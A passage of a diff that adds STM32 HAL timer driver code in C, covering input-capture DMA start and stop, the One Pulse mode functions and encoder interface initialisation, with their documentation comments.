TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @param pData The destination Buffer address. + * @param Length The length of data to be transferred from TIM peripheral to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_Start_DMA(TIM_HandleTypeDef *htim, uint32_t Channel, uint32_t *pData, uint16_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + HAL_TIM_ChannelStateTypeDef channel_state = TIM_CHANNEL_STATE_GET(htim, Channel); + HAL_TIM_ChannelStateTypeDef complementary_channel_state = TIM_CHANNEL_N_STATE_GET(htim, Channel); + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + assert_param(IS_TIM_DMA_CC_INSTANCE(htim->Instance)); + + /* Set the TIM channel state */ + if ((channel_state == HAL_TIM_CHANNEL_STATE_BUSY) + || (complementary_channel_state == HAL_TIM_CHANNEL_STATE_BUSY)) + { + return HAL_BUSY; + } + else if ((channel_state == HAL_TIM_CHANNEL_STATE_READY) + && (complementary_channel_state == HAL_TIM_CHANNEL_STATE_READY)) + { + if ((pData == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + + /* Enable the Input Capture channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_ENABLE); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)&htim->Instance->CCR1, (uint32_t)pData, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 1 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)&htim->Instance->CCR2, (uint32_t)pData, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 2 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC3]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC3]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC3]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC3], (uint32_t)&htim->Instance->CCR3, (uint32_t)pData, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 3 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC3); + break; + } + + case TIM_CHANNEL_4: + { + /* Set the DMA capture callbacks */ + htim->hdma[TIM_DMA_ID_CC4]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC4]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC4]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC4], (uint32_t)&htim->Instance->CCR4, (uint32_t)pData, + Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the TIM Capture/Compare 4 DMA request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC4); + break; + } + + default: + status = HAL_ERROR; + break; + } + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM Input Capture measurement in DMA mode. + * @param htim TIM Input Capture handle + * @param Channel TIM Channels to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_Stop_DMA(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + assert_param(IS_TIM_DMA_CC_INSTANCE(htim->Instance)); + + /* Disable the Input Capture channel */ + TIM_CCxChannelCmd(htim->Instance, Channel, TIM_CCx_DISABLE); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Capture/Compare 1 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC1); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Capture/Compare 2 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC2); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Capture/Compare 3 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC3); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC3]); + break; + } + + case TIM_CHANNEL_4: + { + /* Disable the TIM Capture/Compare 4 DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC4); + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC4]); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} +/** + * @} + */ + +/** @defgroup TIM_Exported_Functions_Group5 TIM One Pulse functions + * @brief TIM One Pulse functions + * +@verbatim + ============================================================================== + ##### TIM One Pulse functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the TIM One Pulse. + (+) De-initialize the TIM One Pulse. + (+) Start the TIM One Pulse. + (+) Stop the TIM One Pulse. + (+) Start the TIM One Pulse and enable interrupt. + (+) Stop the TIM One Pulse and disable interrupt. + (+) Start the TIM One Pulse and enable DMA transfer. + (+) Stop the TIM One Pulse and disable DMA transfer. + +@endverbatim + * @{ + */ +/** + * @brief Initializes the TIM One Pulse Time Base according to the specified + * parameters in the TIM_HandleTypeDef and initializes the associated handle. + * @note Switching from Center Aligned counter mode to Edge counter mode (or reverse) + * requires a timer reset to avoid unexpected direction + * due to DIR bit readonly in center aligned mode. + * Ex: call @ref HAL_TIM_OnePulse_DeInit() before HAL_TIM_OnePulse_Init() + * @note When the timer instance is initialized in One Pulse mode, timer + * channels 1 and channel 2 are reserved and cannot be used for other + * purpose. + * @param htim TIM One Pulse handle + * @param OnePulseMode Select the One pulse mode. + * This parameter can be one of the following values: + * @arg TIM_OPMODE_SINGLE: Only one pulse will be generated. + * @arg TIM_OPMODE_REPETITIVE: Repetitive pulses will be generated. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OnePulse_Init(TIM_HandleTypeDef *htim, uint32_t OnePulseMode) +{ + /* Check the TIM handle allocation */ + if (htim == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + assert_param(IS_TIM_COUNTER_MODE(htim->Init.CounterMode)); + assert_param(IS_TIM_CLOCKDIVISION_DIV(htim->Init.ClockDivision)); + assert_param(IS_TIM_OPM_MODE(OnePulseMode)); + assert_param(IS_TIM_AUTORELOAD_PRELOAD(htim->Init.AutoReloadPreload)); + + if (htim->State == HAL_TIM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + htim->Lock = HAL_UNLOCKED; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + /* Reset interrupt callbacks to legacy weak callbacks */ + TIM_ResetCallback(htim); + + if (htim->OnePulse_MspInitCallback == NULL) + { + htim->OnePulse_MspInitCallback = HAL_TIM_OnePulse_MspInit; + } + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + htim->OnePulse_MspInitCallback(htim); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_TIM_OnePulse_MspInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Configure the Time base in the One Pulse Mode */ + TIM_Base_SetConfig(htim->Instance, &htim->Init); + + /* Reset the OPM Bit */ + htim->Instance->CR1 &= ~TIM_CR1_OPM; + + /* Configure the OPM Mode */ + htim->Instance->CR1 |= OnePulseMode; + + /* Initialize the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + + /* Initialize the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Initialize the TIM state*/ + htim->State = HAL_TIM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the TIM One Pulse + * @param htim TIM One Pulse handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OnePulse_DeInit(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Disable the TIM Peripheral Clock */ + __HAL_TIM_DISABLE(htim); + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + if (htim->OnePulse_MspDeInitCallback == NULL) + { + htim->OnePulse_MspDeInitCallback = HAL_TIM_OnePulse_MspDeInit; + } + /* DeInit the low level hardware */ + htim->OnePulse_MspDeInitCallback(htim); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + HAL_TIM_OnePulse_MspDeInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_RESET; + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_RESET); + + /* Change TIM state */ + htim->State = HAL_TIM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Initializes the TIM One Pulse MSP. + * @param htim TIM One Pulse handle + * @retval None + */ +__weak void HAL_TIM_OnePulse_MspInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_OnePulse_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes TIM One Pulse MSP. + * @param htim TIM One Pulse handle + * @retval None + */ +__weak void HAL_TIM_OnePulse_MspDeInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIM_OnePulse_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief Starts the TIM One Pulse signal generation. + * @note Though OutputChannel parameter is deprecated and ignored by the function + * it has been kept to avoid HAL_TIM API compatibility break. + * @note The pulse output channel is determined when calling + * @ref HAL_TIM_OnePulse_ConfigChannel(). + * @param htim TIM One Pulse handle + * @param OutputChannel See note above + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OnePulse_Start(TIM_HandleTypeDef *htim, uint32_t OutputChannel) +{ + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Prevent unused argument(s) compilation warning */ + UNUSED(OutputChannel); + + /* Check the TIM channels state */ + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the Capture compare and the Input Capture channels + (in the OPM Mode the two possible channels that can be used are TIM_CHANNEL_1 and TIM_CHANNEL_2) + if TIM_CHANNEL_1 is used as output, the TIM_CHANNEL_2 will be used as input and + if TIM_CHANNEL_1 is used as input, the TIM_CHANNEL_2 will be used as output + whatever the combination, the TIM_CHANNEL_1 and TIM_CHANNEL_2 should be enabled together + + No need to enable the counter, it's enabled automatically by hardware + (the counter starts in response to a stimulus and generate a pulse */ + + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_ENABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Enable the main output */ + __HAL_TIM_MOE_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM One Pulse signal generation. + * @note Though OutputChannel parameter is deprecated and ignored by the function + * it has been kept to avoid HAL_TIM API compatibility break. + * @note The pulse output channel is determined when calling + * @ref HAL_TIM_OnePulse_ConfigChannel(). + * @param htim TIM One Pulse handle + * @param OutputChannel See note above + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OnePulse_Stop(TIM_HandleTypeDef *htim, uint32_t OutputChannel) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(OutputChannel); + + /* Disable the Capture compare and the Input Capture channels + (in the OPM Mode the two possible channels that can be used are TIM_CHANNEL_1 and TIM_CHANNEL_2) + if TIM_CHANNEL_1 is used as output, the TIM_CHANNEL_2 will be used as input and + if TIM_CHANNEL_1 is used as input, the TIM_CHANNEL_2 will be used as output + whatever the combination, the TIM_CHANNEL_1 and TIM_CHANNEL_2 should be disabled together */ + + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_DISABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM One Pulse signal generation in interrupt mode. + * @note Though OutputChannel parameter is deprecated and ignored by the function + * it has been kept to avoid HAL_TIM API compatibility break. + * @note The pulse output channel is determined when calling + * @ref HAL_TIM_OnePulse_ConfigChannel(). + * @param htim TIM One Pulse handle + * @param OutputChannel See note above + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OnePulse_Start_IT(TIM_HandleTypeDef *htim, uint32_t OutputChannel) +{ + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Prevent unused argument(s) compilation warning */ + UNUSED(OutputChannel); + + /* Check the TIM channels state */ + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the Capture compare and the Input Capture channels + (in the OPM Mode the two possible channels that can be used are TIM_CHANNEL_1 and TIM_CHANNEL_2) + if TIM_CHANNEL_1 is used as output, the TIM_CHANNEL_2 will be used as input and + if TIM_CHANNEL_1 is used as input, the TIM_CHANNEL_2 will be used as output + whatever the combination, the TIM_CHANNEL_1 and TIM_CHANNEL_2 should be enabled together + + No need to enable the counter, it's enabled automatically by hardware + (the counter starts in response to a stimulus and generate a pulse */ + + /* Enable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + + /* Enable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_ENABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Enable the main output */ + __HAL_TIM_MOE_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM One Pulse signal generation in interrupt mode. + * @note Though OutputChannel parameter is deprecated and ignored by the function + * it has been kept to avoid HAL_TIM API compatibility break. + * @note The pulse output channel is determined when calling + * @ref HAL_TIM_OnePulse_ConfigChannel(). + * @param htim TIM One Pulse handle + * @param OutputChannel See note above + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OnePulse_Stop_IT(TIM_HandleTypeDef *htim, uint32_t OutputChannel) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(OutputChannel); + + /* Disable the TIM Capture/Compare 1 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + + /* Disable the TIM Capture/Compare 2 interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + + /* Disable the Capture compare and the Input Capture channels + (in the OPM Mode the two possible channels that can be used are TIM_CHANNEL_1 and TIM_CHANNEL_2) + if TIM_CHANNEL_1 is used as output, the TIM_CHANNEL_2 will be used as input and + if TIM_CHANNEL_1 is used as input, the TIM_CHANNEL_2 will be used as output + whatever the combination, the TIM_CHANNEL_1 and TIM_CHANNEL_2 should be disabled together */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_2, TIM_CCx_DISABLE); + + if (IS_TIM_BREAK_INSTANCE(htim->Instance) != RESET) + { + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + } + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup TIM_Exported_Functions_Group6 TIM Encoder functions + * @brief TIM Encoder functions + * +@verbatim + ============================================================================== + ##### TIM Encoder functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure the TIM Encoder. + (+) De-initialize the TIM Encoder. + (+) Start the TIM Encoder. + (+) Stop the TIM Encoder. + (+) Start the TIM Encoder and enable interrupt. + (+) Stop the TIM Encoder and disable interrupt. + (+) Start the TIM Encoder and enable DMA transfer. + (+) Stop the TIM Encoder and disable DMA transfer. + +@endverbatim + * @{ + */ +/** + * @brief Initializes the TIM Encoder Interface and initialize the associated handle. + * @note Switching from Center Aligned counter mode to Edge counter mode (or reverse) + * requires a timer reset to avoid unexpected direction + * due to DIR bit readonly in center aligned mode. + * Ex: call @ref HAL_TIM_Encoder_DeInit() before HAL_TIM_Encoder_Init() + * @note Encoder mode and External clock mode 2 are not compatible and must not be selected together + * Ex: A call for @ref HAL_TIM_Encoder_Init will erase the settings of @ref HAL_TIM_ConfigClockSource + * using TIM_CLOCKSOURCE_ETRMODE2 and vice versa + * @note When the timer instance is initialized in Encoder mode, timer + * channels 1 and channel 2 are reserved and cannot be used for other + * purpose. + * @param htim TIM Encoder Interface handle + * @param sConfig TIM Encoder Interface configuration structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Encoder_Init(TIM_HandleTypeDef *htim, TIM_Encoder_InitTypeDef *sConfig) +{ + uint32_t tmpsmcr; + uint32_t tmpccmr1; + uint32_t tmpccer; + + /* Check the TIM handle allocation */ + if (htim == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_TIM_ENCODER_INTERFACE_INSTANCE(htim->Instance)); + assert_param(IS_TIM_COUNTER_MODE(htim->Init.CounterMode)); + assert_param(IS_TIM_CLOCKDIVISION_DIV(htim->Init.ClockDivision)); + assert_param(IS_TIM_AUTORELOAD_PRELOAD(htim->Init.AutoReloadPreload)); + assert_param(IS_TIM_ENCODER_MODE(sConfig->EncoderMode)); + assert_param(IS_TIM_IC_SELECTION(sConfig->IC1Selection)); + assert_param(IS_TIM_IC_SELECTION(sConfig->IC2Selection)); + assert_param(IS_TIM_ENCODERINPUT_POLARITY(sConfig->IC1Polarity)); + assert_param(IS_TIM_ENCODERINPUT_POLARITY(sConfig->IC2Polarity)); + assert_param(IS_TIM_IC_PRESCALER(sConfig->IC1Prescaler)); + assert_param(IS_TIM_IC_PRESCALER(sConfig->IC2Prescaler)); + assert_param(IS_TIM_IC_FILTER(sConfig->IC1Filter)); + assert_param(IS_TIM_IC_FILTER(sConfig->IC2Filter)); + + if (htim->State == HAL_TIM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + htim->Lock = HAL_UNLOCKED; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + /* Reset interrupt callbacks to legacy weak callbacks */ + TIM_ResetCallback(htim); + + if (htim->Encoder_MspInitCallback == NULL) + { + htim->Encoder_MspInitCallback = HAL_TIM_Encoder_MspInit; + } + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + htim->Encoder_MspInitCallback(htim); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_TIM_Encoder_MspInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Reset the SMS and ECE bits */ + htim->Instance->SMCR &= ~(TIM_SMCR_SMS | TIM_SMCR_ECE); + + /* Configure the Time base in the Encoder Mode */ + TIM_Base_SetConfig(htim->Instance, &htim->Init); + + /* Get the TIMx SMCR register value */ + tmpsmcr = htim->Instance->SMCR; + + /* Get the TIMx CCMR1 register value */ + tmpccmr1 = htim->Instance->CCMR1; + + /* Get the TIMx CCER register value */ + tmpccer = htim->Instance->CCER; + + /* Set the encoder Mode */ + tmpsmcr |= sConfig->EncoderMode; + + /* Select the Capture Compare 1 and the Capture Compare 2 as input */ + tmpccmr1 &= ~(TIM_CCMR1_CC1S | TIM_CCMR1_CC2S); + tmpccmr1 |= (sConfig->IC1Selection | (sConfig->IC2Selection << 8U)); + + /* Set the Capture Compare 1 and the Capture Compare 2 prescalers and filters */ + tmpccmr1 &= ~(TIM_CCMR1_IC1PSC | TIM_CCMR1_IC2PSC); + tmpccmr1 &= ~(TIM_CCMR1_IC1F | TIM_CCMR1_IC2F); + tmpccmr1 |= sConfig->IC1Prescaler | (sConfig->IC2Prescaler << 8U); + tmpccmr1 |= (sConfig->IC1Filter << 4U) | (sConfig->IC2Filter << 12U); + + /* Set the TI1 and the TI2 Polarities */ + tmpccer &= ~(TIM_CCER_CC1P | TIM_CCER_CC2P); + tmpccer &= ~(TIM_CCER_CC1NP | TIM_CCER_CC2NP); + tmpccer |= sConfig->IC1Polarity | (sConfig->IC2Polarity << 4U); + + /* Write to TIMx SMCR */ + htim->Instance->SMCR = tmpsmcr; + + /* Write to TIMx CCMR1 */ + htim->Instance->CCMR1 = tmpccmr1; + + /* Write to TIMx CCER */ + htim->Instance->CCER = tmpccer; + + /* Initialize the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Initialize the TIM state*/ + htim->State = HAL_TIM_STATE_READY; + + return HAL_OK; +} + + +/** + * @brief DeInitializes the TIM Encoder interface + * @param htim TIM Encoder Interface handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_Encoder_DeInit(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Disable the TIM Peripheral Clock */ + __HAL_TIM_DISABLE(htim); + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + if (htim->Encoder_MspDeInitCallback == NULL) + { + htim->Encoder_MspDeInitCallback = HAL_TIM_Encoder_MspDeInit; + } + /* DeInit the low level hardware */ + htim->Encoder_MspDeInitCallback(htim); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + HAL_TIM_Encoder_MspDeInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_RESET; + + /* Set the TIM channels state */ 